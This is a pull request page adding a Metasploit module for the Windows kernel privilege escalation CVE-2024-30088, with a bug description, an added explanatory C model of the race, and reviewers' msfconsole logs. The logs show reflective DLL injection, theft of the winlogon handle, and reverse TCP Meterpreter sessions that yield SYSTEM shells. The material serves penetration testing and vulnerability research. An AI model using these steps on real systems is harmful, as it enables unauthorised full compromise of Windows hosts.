
Windows LPE CVE-2024-30088 #19345

Merged: 11 commits, Sep 17, 2024

Conversation

@jheysel-r7 (Contributor) commented Jul 26, 2024

CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,
Windows 11 and Windows Server 2022.

The vulnerability exists inside the function called AuthzBasepCopyoutInternalSecurityAttributes, specifically when
the kernel copies the _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION of the current token object to user mode. When the
kernel performs the copy of the SecurityAttributesList, it sets the list of the SecurityAttribute's structure
directly to the user-supplied pointer. It then calls RtlCopyUnicodeString and
AuthzBasepCopyoutInternalSecurityAttributeValues to copy out the names and values of the SecurityAttribute, leading
to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.

Setup

Windows 10 22H2 versions without the patch (before 10.0.19045.4529) are vulnerable out of the box.
This exploit module has been tested on Windows 10 version 22H2 build 19045.2965.

Verification Steps

  1. Start msfconsole
  2. Get a user level session on an affected Windows machine
  3. Do: use windows/local/cve_2024_30088_authz_basep
  4. Set the LHOST, LPORT, and SESSION options
  5. Run the module
  6. Receive a session running in the context of the NT AUTHORITY\SYSTEM user.
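The description above names the bug class (a kernel copy-out routine that writes a structure into caller memory and then trusts fields it reads back from that same memory). The following is an added example written for this page; it is not code from the pull request, the Metasploit module, or the DLL it ships, and it is a deliberately simplified user-mode model of the double-fetch pattern rather than the actual structures, primitive or exploitation path of CVE-2024-30088. All struct and function names (attr_info_t, user_buf_t, copyout_vulnerable, copyout_hardened, protected_word) are hypothetical, the "kernel" and "user" sides are plain functions in one process, and the race window is modelled as a callback so the outcome is deterministic.

```c
/* Simplified model of a TOCTOU (double-fetch) bug in a copy-out routine.
 * Nothing here touches a real kernel; names are hypothetical stand-ins. */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define USER_SLOTS 4   /* capacity of the caller's value array */

/* Hypothetical header the "kernel" writes into the caller's buffer. */
typedef struct {
    uint32_t  value_count; /* number of entries that follow */
    uint32_t *values;      /* where the entries should be written */
} attr_info_t;

/* "Kernel-side" data being copied out (constructed sample values). */
static const uint32_t kernel_values[2] = { 0x1111, 0x2222 };
static const uint32_t kernel_count = 2;

/* Stands in for memory the caller must never be able to write. */
static uint32_t protected_word = 0xDEAD;

/* The buffer the caller passes in: header plus its own value array. */
typedef struct {
    attr_info_t info;
    uint32_t    slots[USER_SLOTS];
} user_buf_t;

/* Models whatever a concurrent user thread does inside the race window. */
typedef void (*race_hook_t)(user_buf_t *ub);

/* VULNERABLE: the header (count and list pointer) is written to caller
 * memory, and the routine then re-reads both from that memory to drive the
 * value copy.  Between the write and the re-read, user mode can change them. */
int copyout_vulnerable(user_buf_t *ub, race_hook_t race)
{
    ub->info.value_count = kernel_count;   /* first write to caller memory */
    ub->info.values      = ub->slots;      /* list pointer set to caller memory */
    if (race) race(ub);                    /* race window */
    /* BUG: second fetch of pointer and count from caller-controlled memory. */
    for (uint32_t i = 0; i < ub->info.value_count; i++)
        ub->info.values[i] = kernel_values[i];
    return 0;
}

/* HARDENED: every decision comes from kernel-owned copies.  The destination
 * is captured once and bounds-checked, the count never comes from caller
 * memory, and nothing is read back after the race window. */
int copyout_hardened(user_buf_t *ub, race_hook_t race)
{
    uint32_t *dst = ub->slots;             /* captured once, kernel-local */
    uint32_t  n   = kernel_count;          /* trusted source, never re-read */
    if (n > USER_SLOTS) return -1;         /* would not fit the caller's array */
    ub->info.value_count = n;
    ub->info.values      = dst;
    if (race) race(ub);                    /* same window, nothing re-read */
    for (uint32_t i = 0; i < n; i++)
        dst[i] = kernel_values[i];
    return 0;
}

/* Attacker's move in the window: point the list at protected memory and keep
 * the count in range so the redirected write looks like a normal copy. */
static void hijack_pointer(user_buf_t *ub)
{
    ub->info.values      = &protected_word;
    ub->info.value_count = 1;
}

/* Run one variant against the hijacking hook from a clean state and return
 * what is left in protected_word: 0xDEAD means the write was not redirected. */
uint32_t run_variant(int (*variant)(user_buf_t *, race_hook_t))
{
    user_buf_t ub;
    memset(&ub, 0, sizeof ub);
    protected_word = 0xDEAD;
    variant(&ub, hijack_pointer);
    return protected_word;
}

/* Sanity check with no attacker: both variants copy the real values. */
uint32_t run_without_race(int (*variant)(user_buf_t *, race_hook_t), unsigned idx)
{
    user_buf_t ub;
    memset(&ub, 0, sizeof ub);
    variant(&ub, NULL);
    return ub.slots[idx];
}

int main(void)
{
    printf("vulnerable: protected_word = 0x%X\n", run_variant(copyout_vulnerable));
    printf("hardened:   protected_word = 0x%X\n", run_variant(copyout_hardened));
    return 0;
}
```

The point the model makes is the one the description relies on: once the list pointer and count live in caller memory, any later read of them is a second fetch, and the window between the first write and that read is what the exploit races. The hardened variant follows the usual kernel convention of capturing and validating user-supplied values into locals (on Windows, after probing the range) and never consulting user memory again for the same decision.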

@jheysel-r7 force-pushed the win-kernel-lpe-cve-2024-30038 branch from 14b5ad0 to 4811577 on August 22, 2024 01:23
@jheysel-r7 jheysel-r7 marked this pull request as ready for review August 22, 2024 01:52
@jheysel-r7 force-pushed the win-kernel-lpe-cve-2024-30038 branch from bed314c to 31348da on August 22, 2024 06:23
@jheysel-r7 jheysel-r7 changed the title WIP CVE-2024-30088 Windows LPE CVE-2024-30088 Aug 22, 2024
@jheysel-r7 added the a2k19 (Hackathon 2019 in Austin), module and docs labels and removed the a2k19 label, Aug 22, 2024
@bwatters-r7 bwatters-r7 self-assigned this Aug 28, 2024
@bwatters-r7 (Contributor):

The file external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c still exists, but it is empty?

@jheysel-r7 (Contributor, Author) left a comment:

Thanks for the detailed review @bwatters! I've applied your suggestions, recompiled the DLL, and retested the module.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 172.16.199.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 8680...
[*] Attempting to steal the handle from the winlogon process...
[+] Successfully stole winlogon handle: 1936
[+] Successfully retrieved winlogon pid: 720
[*] Sending stage (201798 bytes) to 172.16.199.139
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.139:53613) at 2024-08-29 19:13:23 -0400

[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) >
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-FGNRA7E
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

@bwatters-r7 (Contributor):

I have not been able to get this to work. I'm running this on Windows 10.0.19045.2006

@dledda-r7 dledda-r7 self-assigned this Sep 11, 2024
@jheysel-r7 (Contributor, Author):

Just posting for context. The first time I tested on 10.0.19045.2006 the exploit did fail. I re-established a second user-level session and the exploit succeeded on the second attempt; after this I updated the Reliability comment 05c3c9a, as in my experience the exploit had usually worked on the first attempt. Apologies for the flakiness.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 8112...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 1896
[+] Successfully retrieved winlogon pid: 9140
[*] Sending stage (201798 bytes) to 192.168.123.238
[*] Meterpreter session 13 opened (192.168.123.1:5555 -> 192.168.123.238:49676) at 2024-09-04 13:31:26 -0700

meterpreter > shell
Process 8848 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 10.0.19045.2006]

C:\Windows\system32>

@dledda-r7 (Contributor) left a comment:

Looks good to me.

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options

Module options (exploit/windows/local/cve_2024_30088_authz_basep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.26.90.20     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit

[*] Started reverse TCP handler on 172.26.90.20:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 2676...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 2740
[+] Successfully retrieved winlogon pid: 3680
[*] Sending stage (201798 bytes) to 172.26.91.192
[*] Meterpreter session 2 opened (172.26.90.20:4445 -> 172.26.91.192:50278) at 2024-09-16 09:32:53 -0400

meterpreter > sysinfo
Computer        : DESKTOP-9VQV3U4
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 8728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 10.0.19045.2251]

C:\Windows\system32>
msf6 payload(windows/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole
meterpreter > bg 
[*] Backgrounding session 4...
msf6 payload(windows/x64/meterpreter_reverse_tcp) > search authz_basep

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/local/cve_2024_30088_authz_basep  2024-06-11       excellent  Yes    Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/cve_2024_30088_authz_basep

msf6 payload(windows/x64/meterpreter_reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options

Module options (exploit/windows/local/cve_2024_30088_authz_basep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       172.31.7.159     yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lhost 192.168.3.3
lhost => 192.168.3.3
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit

[*] Started reverse TCP handler on 192.168.3.3:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 3960...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 8008
[+] Successfully retrieved winlogon pid: 568
[*] Meterpreter session 5 opened (192.168.3.3:4445 -> 10.5.134.118:50287) at 2024-09-17 07:41:41 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 10.0.19045.2006]

C:\Windows\system32>

@dledda-r7 dledda-r7 merged commit 0bf5244 into rapid7:master Sep 17, 2024
63 checks passed
@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 17, 2024
@dledda-r7 (Contributor) commented Sep 17, 2024

Release Notes

This adds a Windows LPE post module that exploits CVE-2024-30088. Once the exploit is executed through a running meterpreter session, it will open another one with NT AUTHORITY\SYSTEM privileges.

Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)
4 participants